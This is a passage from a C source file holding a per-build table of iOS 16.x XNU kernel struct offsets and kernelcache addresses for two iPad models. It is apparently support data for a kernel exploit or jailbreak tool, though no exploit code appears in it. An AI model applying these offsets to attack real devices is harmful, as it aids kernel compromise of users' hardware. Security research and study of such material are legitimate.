0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a9f5190, .kernelcache__gPhysBase = 0xfffffe00079a00c8, .kernelcache__gPhysSize = 0xfffffe00079a00c8 + 8, .kernelcache__gVirtBase = 0xfffffe000799e2a8, .kernelcache__perfmon_devices = 0xfffffe000aa303b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7f50, .kernelcache__ptov_table = 0xfffffe00078eb378, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa2f800, .kernelcache__vm_pages = 0xfffffe00078e8090, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea328, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa2f7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a50c, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D47", .device_id = "iPad13,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D67", .device_id = "iPad13,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E246", .device_id = "iPad13,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E252", .device_id = "iPad13,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:54 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8103", .build_version = "20F66", .device_id = "iPad13,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aad5288, .kernelcache__gPhysBase = 0xfffffe0007a84100, .kernelcache__gPhysSize = 0xfffffe0007a84100 + 8, .kernelcache__gVirtBase = 0xfffffe0007a822d8, .kernelcache__perfmon_devices = 0xfffffe000ab13520, .kernelcache__perfmon_dev_open = 0xfffffe00080d45c0, .kernelcache__ptov_table = 0xfffffe00079cf188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab12990, .kernelcache__vm_pages = 0xfffffe00079cbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ce128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab12988, .kernelcache__vn_kqfilter = 0xfffffe000812374c, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:17:58 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8103", .build_version = "20G5026e", .device_id = "iPad13,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000ab85ab0, .kernelcache__gPhysBase = 0xfffffe0007a982a8, .kernelcache__gPhysSize = 0xfffffe0007a982a8 + 8, .kernelcache__gVirtBase = 0xfffffe0007a96460, .kernelcache__perfmon_devices = 0xfffffe000abc5550, .kernelcache__perfmon_dev_open = 0xfffffe00080f8dfc, .kernelcache__ptov_table = 0xfffffe00079e39c8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000abc4910, .kernelcache__vm_pages = 0xfffffe00079e0108, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079e2968, .kernelcache__vm_page_array_ending_addr = 0xfffffe000abc4908, .kernelcache__vn_kqfilter = 0xfffffe0008147958, }, // iPad Pro 11 inch 5th // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:09:33 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8103", .build_version = "20C65", .device_id = "iPad13,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a9f5190, .kernelcache__gPhysBase = 0xfffffe00079a00c8, .kernelcache__gPhysSize = 0xfffffe00079a00c8 + 8, .kernelcache__gVirtBase = 0xfffffe000799e2a8, .kernelcache__perfmon_devices = 0xfffffe000aa303b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7f50, .kernelcache__ptov_table = 0xfffffe00078eb378, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa2f800, .kernelcache__vm_pages = 0xfffffe00078e8090, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea328, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa2f7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a50c, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D47", .device_id = "iPad13,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // 